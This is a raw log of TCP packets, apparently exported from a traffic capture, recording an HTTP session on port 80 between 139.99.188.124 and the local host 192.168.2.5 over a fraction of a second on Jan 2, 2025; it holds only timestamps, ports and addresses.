                                                          Jan 2, 2025 10:55:01.315437078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315445900 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315455914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315474033 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315526962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315570116 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315591097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315620899 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315629959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315653086 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315792084 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315802097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315812111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315833092 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315857887 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315864086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315874100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315881968 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315891027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315907001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315942049 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.316087961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316097975 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316106081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316116095 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316124916 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316128016 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.316134930 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316143036 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.316145897 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.316185951 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.424997091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425026894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425038099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425071955 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425169945 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425179958 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425189972 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425205946 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425240993 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425285101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425295115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425304890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425328016 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425419092 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425430059 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425460100 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425549030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425559044 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425566912 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425575972 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425585985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425590038 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425595999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425616026 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425761938 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425777912 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425803900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425940037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425949097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425959110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425966978 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425976038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425980091 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425983906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425992966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425997972 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426002979 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426012039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426023960 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426043987 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426223040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426230907 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426245928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426254034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426263094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426270962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426276922 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426301003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426309109 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426508904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426520109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426528931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426538944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426548958 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426552057 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426558971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426573038 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426588058 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426769018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426778078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426786900 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426795959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426805019 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426812887 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426814079 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426822901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426826000 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426832914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426841021 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426847935 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426866055 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427158117 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427166939 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427175045 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427184105 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427192926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427196980 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427201033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427211046 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427215099 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427218914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427228928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427236080 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427238941 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427256107 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427263975 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427609921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427618980 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427627087 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427642107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427649975 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427650928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427660942 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427668095 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427670956 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427679062 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427687883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427691936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427695990 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427700043 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427705050 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427714109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427721977 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427727938 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427742004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428108931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428117990 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428126097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428133965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428147078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428153992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428164005 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428174973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428320885 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428440094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428448915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428458929 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428487062 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428525925 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435540915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435600996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435610056 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435635090 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435657024 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435667038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435709953 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435739040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435746908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435786963 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435961008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435970068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435978889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435987949 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435997009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436005116 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436007023 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436013937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436022997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436033010 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436037064 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436062098 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436078072 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436187029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436197042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436239004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436296940 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436306953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436315060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436322927 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436331987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436341047 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436508894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436517954 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436526060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436534882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436542034 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436543941 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436559916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436585903 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436691999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436702013 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436711073 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436719894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436728001 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436737061 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436738014 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436774015 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436789989 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512037992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512236118 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512249947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512259960 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512274027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512301922 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512310028 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512320042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512329102 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512403011 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512413025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512422085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512430906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512442112 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512474060 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512474060 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512485027 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512645006 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512655973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512664080 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512672901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512682915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512696028 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512723923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512777090 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512821913 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512883902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512892962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512901068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512909889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512917995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512928009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512931108 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512942076 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512959003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512986898 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513164997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513174057 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513187885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513195992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513204098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513210058 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513214111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513222933 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513231039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513233900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513241053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513271093 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513293028 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513552904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513561964 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513570070 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513577938 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513586998 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513614893 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513629913 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513700008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513709068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513719082 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513742924 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513763905 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513883114 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513890982 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513899088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513909101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513916969 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513923883 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513926029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513935089 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513945103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513957977 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513978958 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513988018 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514182091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514189959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514199018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514206886 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514215946 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514224052 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514233112 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514235020 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514270067 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514537096 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514545918 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514554977 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514563084 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514574051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514589071 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514602900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514621973 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514682055 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514697075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514704943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514714003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514724016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514729023 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514734983 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514744043 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514761925 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514770985 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514923096 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514967918 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.515074015 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515089035 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515096903 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515105963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515115976 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515124083 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515125990 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.515132904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515142918 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515151024 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515160084 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.515161991 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.515177965 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.515197992 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522362947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522416115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522425890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522464991 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522474051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522481918 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522521019 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522550106 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522559881 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522567987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522589922 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522604942 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522682905 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522691965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522701025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522722006 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522732973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522773981 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522798061 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522808075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522840023 CET4970580192.168.2.5139.99.188.124
